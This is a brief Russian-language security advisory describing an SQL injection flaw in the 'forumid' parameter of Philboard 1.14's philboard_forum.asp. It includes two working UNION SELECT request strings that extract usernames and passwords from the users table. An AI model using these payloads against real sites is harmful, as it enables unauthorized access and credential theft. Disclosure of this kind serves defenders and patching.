Программа: Philboard 1.14

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «forumid» сценарием philboard_forum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

Username
philboard_forum.asp?forumid=-1+union+select+0,username, 2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16, 17,18+from+users

Password
philboard_forum.asp?forumid=-1+union+select+0,password, 2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16, 17,18+from+users



Оставить мнение